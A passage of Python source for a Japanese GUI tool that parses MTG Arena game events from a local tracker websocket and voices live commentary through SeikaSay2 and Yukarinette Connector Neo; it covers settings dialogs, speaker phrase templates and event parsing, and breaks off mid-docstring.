    # Mutable state: these defaults are used until load_config() runs below.
    self.config = {
        ConfigKey.SEIKA_SAY2_PATH : ".\\"+ProcessName.SEIKA_SAY2,
        ConfigKey.SPEAKER1 : {
            ConfigKey.CID : 0,
            ConfigKey.NAME : ""
        },
        ConfigKey.SPEAKER2 : {
            ConfigKey.CID : 0,
            ConfigKey.NAME : ""
        },
        ConfigKey.HERO_COMMENTARY_TYPE : ConfigValue.SPEAKER1,
        ConfigKey.OPPONENT_COMMENTARY_TYPE : ConfigValue.SPEAKER1,
        ConfigKey.MTGATRACKER_BACKEND_URL : "ws://localhost:8089",
        ConfigKey.WAV_OUTPUT : False,
        ConfigKey.YUKARINETTE_CONNECTOR_NEO : False,
        ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL : "http://localhost:15520/api/input?text="
    }
    self.cids = []
    self.speakers = []
    self.speaker1_obj = {}
    self.speaker2_obj = {}
    self.hero_screen_name = ""
    self.opponent_screen_name = ""
    # Combobox choices shown in the settings dialog.
    self.HERO_COMMENTARY_TYPES = ["話者1が一人称で実況する", "実況しない"]
    self.OPPONENT_COMMENTARY_TYPES = ["話者1が三人称で実況する", "話者2が一人称で実況する", "実況しない"]
    self.WAV_OUTPUT = ["WAVファイルを出力しない", "WAVファイル出力用batファイルを作成する"]
    self.YUKARINETTE_CONNECTOR_NEO = ["連携しない", "ゆかりねっとコネクター Neoに実況内容を連携する"]
    # GUI: a scrollable commentary log plus save/quit buttons.
    self.master.title("MTGA自動実況ツール")
    self.master.geometry("600x360")
    self.master_frame = tkinter.Frame(self.master)
    self.master_frame.pack()
    self.master_text = ScrolledText(self.master_frame, state='disabled')
    self.master_text.pack()
    self.master_quit = tkinter.Button(self.master_frame, text=" 終了 ", command=self.master_frame_quit)
    self.master_quit.pack(fill='x', padx=10, pady=5, side = 'right')
    self.master_save = tkinter.Button(self.master_frame, text=" 保存 ", command=self.master_frame_save)
    self.master_save.pack(fill='x', padx=10, pady=5, side = 'right')
    # Logging: stdout at INFO, rotating file at DEBUG.
    self.logger = logging.getLogger(__name__)
    self.logger.setLevel(logging.DEBUG)
    stream_handler = logging.StreamHandler(sys.stdout)
    stream_handler.setLevel(logging.INFO)
    must_rollover = False
    if os.path.exists(self.LOG_FILE): # check before creating the handler, which creates the file
        must_rollover = True
    rotating_handler = logging.handlers.RotatingFileHandler(self.LOG_FILE, backupCount=10)
    rotating_handler.setLevel(logging.DEBUG)
    if must_rollover:
        try:
            rotating_handler.doRollover()
        except PermissionError:
            # Rotation fails when another instance holds the log open.
            print("警告: {} のローテーションに失敗しました。ログファイルが出力されません。".format(self.LOG_FILE))
    self.logger.addHandler(stream_handler)
    self.logger.addHandler(rotating_handler)
    # Load (and create on first run) the configuration file.
    self.logger.info("Loading {}".format(self.CONFIG_FILE))
    if self.load_config():
        self.logger.info("Loading {}: OK".format(self.CONFIG_FILE))
    else:
        self.logger.info("Loading {}: NG".format(self.CONFIG_FILE))
def master_frame_save(self):
    """Save the commentary log shown in the main window to a text file."""
    filename = "MTGA自動実況_{}.txt".format(datetime.now().strftime('%Y%m%d_%H%M%S'))
    # Bug fix: the tkinter dialog option is "filetypes" (plural);
    # "filetype" raises TclError ("bad option") when the dialog opens.
    path = filedialog.asksaveasfilename(filetypes=[("テキストファイル","*.txt")], initialdir=os.getcwd(), initialfile=filename)
    if path:
        # Append mode so an existing file chosen by the user is not truncated.
        with open(path, 'a', encoding="utf_8_sig") as af:
            af.write(self.master_text.get("1.0","end"))
def master_frame_quit(self):
    """Ask for confirmation, then close the application window."""
    confirmed = messagebox.askyesno("終了確認", "終了してよろしいですか?")
    if confirmed:
        self.master.destroy()
def start_ws_client(self):
    """Run the mtgatracker_backend websocket client on a background thread."""
    import threading
    worker = threading.Thread(target=self.connect_to_socket)
    worker.start()
def connect_to_socket(self):
    """Connect to mtgatracker_backend and dispatch websocket events.

    run_forever() blocks until the connection closes, so this is meant to
    run on the worker thread started by start_ws_client().
    """
    websocket.enableTrace(False)
    self.ws = websocket.WebSocketApp(self.config.get(ConfigKey.MTGATRACKER_BACKEND_URL),
    on_open = self.on_open,
    on_message = self.on_message,
    on_error = self.on_error,
    on_close = self.on_close)
    self.ws.run_forever()
def start_http_client(self, url):
    """Send the GET request for *url* from a worker thread (non-blocking)."""
    import threading
    threading.Thread(target=self.connect_to_yukarinette_conecctor_neo, args=(url,)).start()
def connect_to_yukarinette_conecctor_neo(self, url):
    """Fire a GET request to Yukarinette Connector Neo; the response is ignored.

    NOTE(review): the method name keeps the original "conecctor" spelling
    because start_http_client() references it by name.
    """
    urllib.request.urlopen(url=url)
def load_config(self, config_file=None):
if not config_file:
config_file = self.CONFIG_FILE
if not os.path.exists(config_file):
self.save_config(config_file, self.config)
with open(config_file if config_file else self.CONFIG_FILE, 'r', encoding="utf_8_sig") as rf:
self.config = json.load(rf)
if self.config.get(ConfigKey.WAV_OUTPUT) is None:
self.config[ConfigKey.WAV_OUTPUT] = False
if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) is None:
self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO] = False
if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL) is None:
self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL] = "http://localhost:15520/api/input?text="
return self.config
def save_config(self, config_file=None, config=None):
with open(config_file if config_file else self.CONFIG_FILE, 'w', encoding="utf_8_sig") as wf:
json.dump(config if config else self.config, wf, indent=4, ensure_ascii=False)
def open_config_window(self):
    """Open the modal settings dialog and block until it is closed.

    Widget values are written back to self.config by config_window_ok().
    Requires get_speaker_list() to have populated self.cids/self.speakers.
    """
    speaker1_index = self.cids.index(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID))
    speaker2_index = self.cids.index(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID))
    self.config_window = tkinter.Toplevel(self)
    self.config_window.title("MTGA自動実況ツール - 設定ウィンドウ")
    self.config_window.geometry("500x250")
    self.config_window.grab_set()  # make the dialog modal
    self.config_window.focus_set()  # move focus to the new window
    self.config_window.transient(self.master)  # keep it off the taskbar
    self.config_frame = ttk.Frame(self.config_window)
    self.config_frame.grid(column=0, row=0, sticky=tkinter.NSEW, padx=5, pady=5)
    self.sv_seikasay2_path = tkinter.StringVar()
    self.sv_seikasay2_path.set(self.config.get(ConfigKey.SEIKA_SAY2_PATH))
    self.sv_speaker1 = tkinter.StringVar()
    self.sv_speaker2 = tkinter.StringVar()
    self.sv_hero_commentary_type = tkinter.StringVar()
    self.sv_opponent_commentary_type = tkinter.StringVar()
    self.sv_wav_output = tkinter.StringVar()
    self.sv_yukarinette_connector_neo = tkinter.StringVar()
    button_seikasay2 = tkinter.Button(self.config_frame, text=" 参照 ", command=self.config_window_seikasay2)
    button_seikasay2.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_speaker1 = ttk.Label(self.config_frame, text="話者1: ", anchor="w")
    label_speaker1.grid(row=0, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_speaker1 = ttk.Combobox(self.config_frame, width=40, values=self.speakers, textvariable=self.sv_speaker1, state="readonly")
    combobox_speaker1.current(speaker1_index)
    combobox_speaker1.grid(row=0, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    # The combobox entries start with the cid, hence split(" ")[0] below.
    button_speaker1 = tkinter.Button(self.config_frame, text=" 編集 ", command=lambda: self.open_speaker_window(self.sv_speaker1.get().split(" ")[0]))
    button_speaker1.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_speaker2 = ttk.Label(self.config_frame, text="話者2: ", anchor="w")
    label_speaker2.grid(row=1, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_speaker2 = ttk.Combobox(self.config_frame, width=40, values=self.speakers, textvariable=self.sv_speaker2, state="readonly")
    combobox_speaker2.current(speaker2_index)
    combobox_speaker2.grid(row=1, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    button_speaker2 = tkinter.Button(self.config_frame, text=" 編集 ", command=lambda: self.open_speaker_window(self.sv_speaker2.get().split(" ")[0]))
    button_speaker2.grid(row=1, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_hero_commentary_type = ttk.Label(self.config_frame, text="自分のアクション: ", anchor="w")
    label_hero_commentary_type.grid(row=2, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_hero_commentary_type = ttk.Combobox(self.config_frame, width=40, values=self.HERO_COMMENTARY_TYPES, textvariable=self.sv_hero_commentary_type, state="readonly")
    combobox_hero_commentary_type.current(0 if self.config.get(ConfigKey.HERO_COMMENTARY_TYPE) == ConfigValue.SPEAKER1 else 1)
    combobox_hero_commentary_type.grid(row=2, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_opponent_commentary_type = ttk.Label(self.config_frame, text="対戦相手のアクション: ", anchor="w")
    label_opponent_commentary_type.grid(row=3, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_opponent_commentary_type = ttk.Combobox(self.config_frame, width=40, values=self.OPPONENT_COMMENTARY_TYPES, textvariable=self.sv_opponent_commentary_type, state="readonly")
    combobox_opponent_commentary_type.current(0 if self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER1 else 1 if self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER2 else 2)
    combobox_opponent_commentary_type.grid(row=3, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_wav_output = ttk.Label(self.config_frame, text="WAVファイル出力: ", anchor="w")
    label_wav_output.grid(row=4, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_wav_output = ttk.Combobox(self.config_frame, width=40, values=self.WAV_OUTPUT, textvariable=self.sv_wav_output, state="readonly")
    combobox_wav_output.current(0 if not self.config.get(ConfigKey.WAV_OUTPUT) else 1)
    combobox_wav_output.grid(row=4, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    label_yukarinette_connector_neo = ttk.Label(self.config_frame, text="ゆかりねっとコネクター Neo: ", anchor="w")
    label_yukarinette_connector_neo.grid(row=5, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    combobox_yukarinette_connector_neo = ttk.Combobox(self.config_frame, width=40, values=self.YUKARINETTE_CONNECTOR_NEO, textvariable=self.sv_yukarinette_connector_neo, state="readonly")
    combobox_yukarinette_connector_neo.current(0 if not self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) else 1)
    combobox_yukarinette_connector_neo.grid(row=5, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
    button_ok = tkinter.Button(self.config_frame, text=" 開始 ", command=self.config_window_ok)
    button_ok.grid(row=6, column=2, sticky=tkinter.E, padx=5, pady=10)
    self.wait_window(self.config_window)
def config_window_seikasay2(self):
    """Let the user browse for SeikaSay2.exe and store the chosen path."""
    # Bug fix: the tkinter dialog option is "filetypes" (plural);
    # "filetype" raises TclError ("bad option") when the dialog opens.
    path = filedialog.askopenfilename(filetypes=[("実行ファイル","*.exe")], initialdir=os.getcwd())
    if path:
        self.sv_seikasay2_path.set(path)
def config_window_ok(self):
    """Commit the settings dialog: copy widget values to self.config, save, close."""
    self.config[ConfigKey.SEIKA_SAY2_PATH] = self.sv_seikasay2_path.get()
    # Combobox entries start with the cid, so split(" ")[0] extracts it.
    self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.sv_speaker1.get().split(" ")[0]
    self.config[ConfigKey.SPEAKER1][ConfigKey.NAME] = self.sv_speaker1.get()
    self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.sv_speaker2.get().split(" ")[0]
    self.config[ConfigKey.SPEAKER2][ConfigKey.NAME] = self.sv_speaker2.get()
    self.config[ConfigKey.HERO_COMMENTARY_TYPE] = \
        ConfigValue.SPEAKER1 if self.sv_hero_commentary_type.get() == self.HERO_COMMENTARY_TYPES[0] \
        else ConfigValue.NEVER
    self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] = \
        ConfigValue.SPEAKER1 if self.sv_opponent_commentary_type.get() == self.OPPONENT_COMMENTARY_TYPES[0] \
        else ConfigValue.SPEAKER2 if self.sv_opponent_commentary_type.get() == self.OPPONENT_COMMENTARY_TYPES[1] \
        else ConfigValue.NEVER
    # Idiom fix: direct comparison instead of "False if ... else True".
    self.config[ConfigKey.WAV_OUTPUT] = self.sv_wav_output.get() != self.WAV_OUTPUT[0]
    self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO] = self.sv_yukarinette_connector_neo.get() != self.YUKARINETTE_CONNECTOR_NEO[0]
    self.save_config()
    self.config_window.destroy()
def config_window_cancel(self):
    """Close the settings dialog without saving."""
    self.config_window.destroy()
def open_speaker1_window(self):
    """Open the phrase editor for speaker 1 (cid parsed from the combobox value)."""
    self.open_speaker_window(self.sv_speaker1.get().split(" ")[0])
def open_speaker2_window(self):
    """Open the phrase editor for speaker 2 (cid parsed from the combobox value)."""
    self.open_speaker_window(self.sv_speaker2.get().split(" ")[0])
def get_speak_obj(self, speakers, event):
    """Return the "speak" entry of the first *speakers* item matching *event*, else None."""
    matches = (entry.get(SpeakerKey.SPEAK) for entry in speakers
               if entry.get(SpeakerKey.EVENT) == event)
    return next(matches, None)
def open_speaker_window(self, cid):
    """Open the modal phrase editor for voice *cid* and block until closed.

    Builds one row per SpeakerWindowEntry with three text columns:
    0 = hero first person, 1 = opponent third person, 2 = opponent first
    person. Edits are persisted by speaker_window_ok().
    """
    speakers = self.load_speaker(cid)
    self.speaker_window = tkinter.Toplevel(self.config_window)
    self.speaker_window.title("MTGA自動実況ツール - 話者ウィンドウ - {}".format(self.get_speaker_name(cid)))
    self.speaker_window.geometry("940x600")
    self.speaker_window.grab_set()  # make the dialog modal
    self.speaker_window.focus_set()  # move focus to the new window
    self.speaker_window.transient(self.master)  # keep it off the taskbar
    self.speaker_frame = ttk.Frame(self.speaker_window)
    self.speaker_frame.grid(column=0, row=0, sticky=tkinter.NSEW, padx=5, pady=5)
    label1 = ttk.Label(self.speaker_frame, text="自分のアクション(一人称)", anchor="w")
    label1.grid(row=0, column=1, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
    label2 = ttk.Label(self.speaker_frame, text="対戦相手のアクション(三人称)", anchor="w")
    label2.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
    label3 = ttk.Label(self.speaker_frame, text="対戦相手のアクション(一人称)", anchor="w")
    label3.grid(row=0, column=3, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
    labels = {}
    svs = {}
    entrys = {}
    i = 1
    for key in SpeakerWindowEntry:
        labels[key.name] = ttk.Label(self.speaker_frame, text=key.value[1], anchor="w")
        labels[key.name].grid(row=i, column=0, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
        svs[key.name] = []
        entrys[key.name] = []
        for j in range(3):
            svs[key.name].append(StringVar())
            svs[key.name][j].set(self.get_speak_obj(speakers, key.value[0])[j].get(SpeakerKey.TEXT))
            entrys[key.name].append(ttk.Entry(self.speaker_frame, width=40, textvariable=svs[key.name][j]))
            entrys[key.name][j].grid(row=i, column=j+1, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
            # Game start/win/lose and mulligan have no opponent variants.
            if j > 0 and key.value[0] in [Event.GAME_START, Event.GAME_WIN, Event.GAME_LOSE, Event.MULLIGAN_CHECK]:
                entrys[key.name][j].config(state='disabled')
        i += 1
    button_ok = tkinter.Button(self.speaker_frame, text="保存して閉じる", command=lambda: self.speaker_window_ok(cid, speakers, svs))
    button_ok.grid(row=i, column=2, sticky=tkinter.W + tkinter.E, padx=4, pady=10)
    button_cancel = tkinter.Button(self.speaker_frame, text="保存しないで閉じる", command=self.speaker_window_cancel)
    button_cancel.grid(row=i, column=3, sticky=tkinter.W + tkinter.E, padx=4, pady=10)
    self.wait_window(self.speaker_window)
def speaker_window_ok(self, cid, speakers, svs):
    """Copy the edited texts back into *speakers*, persist them, close the editor."""
    for entry in SpeakerWindowEntry:
        speak_list = self.get_speak_obj(speakers, entry.value[0])
        for column in range(3):
            speak_list[column][SpeakerKey.TEXT] = svs[entry.name][column].get()
    self.save_speaker(cid, speakers)
    self.speaker_window.destroy()
def speaker_window_cancel(self):
    """Close the phrase editor without saving."""
    self.speaker_window.destroy()
def load_speaker(self, cid):
speaker_file = "config\\{}.json".format(cid)
if not os.path.isfile(speaker_file):
speaker_file = self.DEFAULT_SPEAKER_FILE
with open(speaker_file, 'r', encoding="utf_8_sig") as rf:
return json.load(rf)
def save_speaker(self, cid, speaker):
speaker_file = "config\\{}.json".format(cid)
with open(speaker_file, 'w', encoding="utf_8_sig") as wf:
json.dump(speaker, wf, ensure_ascii=False)
def del_ruby(self, s):
    """Strip markup tags and parenthesized ruby readings from a card name.

    Bug fix: the original second pattern was "(.+?)" with unescaped
    parentheses — a capture group around ".+?" — which matches every single
    character and deleted the whole string. The parentheses must be matched
    literally; both ASCII and full-width forms are handled.
    """
    without_tags = re.sub("<.+?>", "", s)
    return re.sub(r"[((].+?[))]", "", without_tags)
def parse(self, blob):
    """Translate one mtgatracker_backend message into a flat event dict.

    *blob* is the decoded JSON message; its "game_history_event" value is a
    list mixing fragment dicts ({"text": ..., "type": ...}) and plain verb
    strings. Returns a dict keyed by ParseKey constants, or None when there
    is nothing to parse. Also records both screen names on game start.
    """
    self.logger.debug(blob)
    if blob:
        text_array = blob.get(MessageKey.GAME_HISTORY_EVENT)
        if not text_array:
            return None
        parsed = {}
        if len(text_array) == 0:
            self.logger.warning("warning: 長さ0のtext_array")
        elif len(text_array) == 1:
            # Game end: {"text": "screenName won!", "type": "game"}
            if text_array[0].get(MessageKey.TYPE) == MessageValue.GAME:
                parsed[ParseKey.MESSAGE_TYPE] = text_array[0].get(MessageKey.TYPE)
                if text_array[0].get(MessageKey.TEXT).startswith(self.hero_screen_name):
                    parsed[ParseKey.EVENT] = Event.GAME_WIN
                else:
                    parsed[ParseKey.EVENT] = Event.GAME_LOSE
            # Turn start: {"text": "N / screenName Turn M", "type": "turn"}
            elif text_array[0].get(MessageKey.TYPE) == MessageValue.TURN:
                if text_array[0].get(MessageKey.TEXT).find(self.opponent_screen_name) >= 0:
                    parsed[ParseKey.IS_OPPONENT] = True
                parsed[ParseKey.MESSAGE_TYPE] = text_array[0].get(MessageKey.TYPE)
                parsed[ParseKey.EVENT] = Event.TURN_START
            else:
                self.logger.warning("warning: 不明なtype: {}".format(text_array[0].get(MessageKey.TYPE)))
        else:
            parsed[ParseKey.VERB] = text_array[1].strip()
            # Verb slot "'s" means an ability message:
            # [card, "'s ", {ability}, ...] — reshape so the real verb lines up.
            if parsed.get(ParseKey.VERB) == "'s":
                parsed[ParseKey.SOURCE] = text_array[0].get(MessageKey.TEXT)
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.MESSAGE_TYPE] = text_array[2].get(MessageKey.TYPE)  # ability
                # Without ":" the subject directly follows "'s"
                # (e.g. "CARDNAME1 's ability exiles CARDNAME2").
                if len(text_array) >= 4 and text_array[3].strip() != ":":
                    text_array = text_array[2:]
                # With ":" the subject follows the ":"
                # (e.g. "CARDNAME1 's ability : SCREENNAME draws CARDNAME2").
                elif len(text_array) >= 6 and text_array[3].strip() == ":":
                    text_array = text_array[4:]
                parsed[ParseKey.VERB] = text_array[1].strip()
            # Verb slot ":" means the subject follows the ":".
            if parsed.get(ParseKey.VERB) == ":":
                parsed[ParseKey.SOURCE] = text_array[0].get(MessageKey.TEXT)
                if len(text_array) >= 4:  # e.g. "CARDNAME1 : SCREENNAME draws CARDNAME2"
                    text_array = text_array[2:]
                    parsed[ParseKey.VERB] = text_array[1].strip()
            # Attacker declared: [card, " attacking"]
            if parsed.get(ParseKey.VERB) == Verb.ATTAKING:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.ATTACKER] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
                parsed[ParseKey.CARD] = parsed[ParseKey.ATTACKER]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.ATTACK
            elif parsed.get(ParseKey.VERB) == Verb.BLOCKS:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.BLOCKER] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
                parsed[ParseKey.ATTACKER] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                parsed[ParseKey.CARD] = parsed[ParseKey.BLOCKER]  # alias kept for templates
                parsed[ParseKey.SOURCE] = parsed[ParseKey.BLOCKER]  # alias kept for templates
                parsed[ParseKey.TARGET] = parsed[ParseKey.ATTACKER]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.BLOCK
            elif parsed.get(ParseKey.VERB) == Verb.CASTS:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                parsed[ParseKey.EVENT] = Event.CAST_SPELL
            elif parsed.get(ParseKey.VERB) == Verb.COUNTERS:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.SOURCE] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
                parsed[ParseKey.TARGET] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                parsed[ParseKey.CARD] = parsed[ParseKey.TARGET]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.COUNTERED
            elif parsed.get(ParseKey.VERB) == Verb.DRAWS:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                # The drawn card is only present when it is visible to us.
                if len(text_array) >= 3:
                    parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                    parsed[ParseKey.TARGET] = parsed[ParseKey.CARD]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.DRAW
            elif parsed.get(ParseKey.VERB) == Verb.EXILES:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[2].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                parsed[ParseKey.TARGET] = parsed[ParseKey.CARD]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.EXILE
            elif parsed.get(ParseKey.VERB) == Verb.LIFE_TOTAL_CHANGED:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                # Third fragment is "old -> new".
                parsed[ParseKey.LIFE_FROM] = int(text_array[2].split(" -> ")[0])
                parsed[ParseKey.LIFE_TO] = int(text_array[2].split(" -> ")[1])
                parsed[ParseKey.SOURCE] = parsed[ParseKey.LIFE_FROM]  # alias kept for templates
                parsed[ParseKey.TARGET] = parsed[ParseKey.LIFE_TO]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.LIFE_GAIN if parsed[ParseKey.LIFE_FROM] < parsed[ParseKey.LIFE_TO] else Event.LIFE_LOSE
                parsed[ParseKey.LIFE_DIFF] = abs(parsed[ParseKey.LIFE_TO] - parsed[ParseKey.LIFE_FROM])
            elif parsed.get(ParseKey.VERB) == Verb.PLAYS:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
                parsed[ParseKey.TARGET] = parsed[ParseKey.CARD]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.PLAY_LAND
            elif parsed.get(ParseKey.VERB) == Verb.RESOLVES:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.CARD] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
                parsed[ParseKey.TARGET] = parsed[ParseKey.CARD]  # alias kept for templates
                parsed[ParseKey.EVENT] = Event.RESOLVE
            elif parsed.get(ParseKey.VERB) == Verb.SENT_TO_GRAVEYARD:
                parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
                parsed[ParseKey.CARD] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
                parsed[ParseKey.TARGET] = parsed[ParseKey.CARD]  # alias kept for templates
                parsed[ParseKey.REASON] = text_array[2]
                # Death: lethal damage, deathtouch, or toughness below zero.
                if parsed.get(ParseKey.REASON) in [Reason.SBA_DAMEGE, Reason.SBA_DEATHTOUCH, Reason.SBA_ZERO_TOUGHNESS]:
                    parsed[ParseKey.EVENT] = Event.DIE
                elif parsed.get(ParseKey.REASON) in [Reason.DESTROY]:  # destroyed
                    parsed[ParseKey.EVENT] = Event.DESTROY
                elif parsed.get(ParseKey.REASON) in [Reason.SACRIFICE]:  # sacrificed
                    parsed[ParseKey.EVENT] = Event.SACRIFICE
                elif parsed.get(ParseKey.REASON) in [Reason.CONJURE]:  # conjured
                    parsed[ParseKey.EVENT] = Event.CONJURE
                elif parsed.get(ParseKey.REASON) in [Reason.DISCARD]:  # discarded
                    parsed[ParseKey.EVENT] = Event.DISCARD
                # Mill, put-into-graveyard effects, unattached auras,
                # and spells with illegal targets.
                elif parsed.get(ParseKey.REASON) in [Reason.MILL, Reason.PUT, Reason.SBA_UNATTACHED_AURA, Reason.NIL]:
                    parsed[ParseKey.EVENT] = Event.PUT_INTO_GRAVEYARD
                else:
                    self.logger.warning("warning: 不明なreason: {}".format(parsed.get(ParseKey.REASON)))
            elif parsed.get(ParseKey.VERB) == Verb.STARTING_HAND:
                parsed[ParseKey.EVENT] = Event.MULLIGAN_CHECK
            elif parsed.get(ParseKey.VERB) == Verb.VS:
                # Game start: remember both screen names for later messages.
                self.hero_screen_name = text_array[0].get(MessageKey.TEXT)
                self.opponent_screen_name = text_array[2].get(MessageKey.TEXT)
                parsed[ParseKey.SOURCE] = self.hero_screen_name  # informational
                parsed[ParseKey.TARGET] = self.opponent_screen_name  # informational
                parsed[ParseKey.EVENT] = Event.GAME_START
            else:
                self.logger.warning("warning: 不明なverb: {}".format(parsed.get(ParseKey.VERB)))
        return parsed
    else:
        return None
def gen_text(self, parsed):
    """Pick the speaker and build the phrase for a parsed event.

    Returns (cid, text, speak_param_obj) or None when the configured
    commentary type disables narration for this side (or the event has
    no phrase entry).
    """
    # Choose speaker and which of the three phrase columns to use:
    # 0 = hero first person, 1 = opponent third person, 2 = opponent first person.
    if not parsed.get(ParseKey.IS_OPPONENT):
        if self.config.get(ConfigKey.HERO_COMMENTARY_TYPE) != ConfigValue.SPEAKER1:
            return None
        cid = self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID)
        speaker = self.speaker1_obj
        speak_idx = 0
    else:
        opponent_type = self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE)
        if opponent_type == ConfigValue.SPEAKER1:
            cid = self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID)
            speaker = self.speaker1_obj
            speak_idx = 1
        elif opponent_type == ConfigValue.SPEAKER2:
            cid = self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID)
            speaker = self.speaker2_obj
            speak_idx = 2
        else:
            return None
    speak_obj = None
    for obj in speaker:
        if obj.get(SpeakerKey.EVENT) == parsed.get(ParseKey.EVENT):
            speak_obj = obj.get(SpeakerKey.SPEAK)[speak_idx]
            break
    if speak_obj is None:
        # Robustness fix: unknown event — the original crashed on
        # speak_obj.get() below.
        return None
    text = speak_obj.get(SpeakerKey.TEXT)
    for word in ReplaceWord:
        # Bug fix: the original tested str(value), which is "None" (truthy)
        # for missing keys, so missing placeholders were replaced with the
        # literal text "None" instead of being removed.
        value = parsed.get(word.value)
        text = text.replace("{"+word.value+"}", str(value) if value is not None else "")
    # Speaker-wide SeikaSay2 defaults, if present in the definition file.
    defaults = {}
    for obj in speaker:
        if obj.get(SpeakerKey.TYPE) == SpeakerValue.SEIKA_SAY2:
            defaults = obj
            break
    # Bug fix: the original merged per-phrase values with the defaults only
    # when NO defaults entry was found (inverted condition), and when one
    # WAS found it overwrote — and mutated in place — the defaults entry.
    # Build a fresh dict: each per-phrase value overrides the speaker-wide
    # default, which fills in whenever the phrase leaves a parameter unset.
    param_keys = (
        SpeakerParamKey.ASYNC, SpeakerParamKey.VOLUME, SpeakerParamKey.SPEED,
        SpeakerParamKey.PITCH, SpeakerParamKey.ALPHA, SpeakerParamKey.INTONATION,
        SpeakerParamKey.EMOTION_EP, SpeakerParamKey.EMOTION_P, SpeakerParamKey.OVER_BANNER,
    )
    speak_param_obj = {
        key: (speak_obj.get(key) if speak_obj.get(key) else defaults.get(key))
        for key in param_keys
    }
    return cid, text, speak_param_obj
def get_speaker_list(self):
    """Query SeikaSay2 for available voices; cache them on self.cids / self.speakers."""
    self.cids, self.speakers = self.seikasay2.list()
    return self.cids, self.speakers
def get_speaker_name(self, cid):
for speaker in self.speakers:
if speaker.startswith(cid):
try:
return re.sub("^"+cid, "", speaker).split(" - ")[0].strip()
except:
return None
return None
def speak(self, cid, text, speak_param_obj=None, save=True):
    """Voice *text* with SeikaSay2 voice *cid*.

    *speak_param_obj* carries optional SeikaSay2 parameters (volume, speed,
    ...). When *save* is true the text is also forwarded to Yukarinette
    Connector Neo and/or logged to the WAV batch file, as configured.
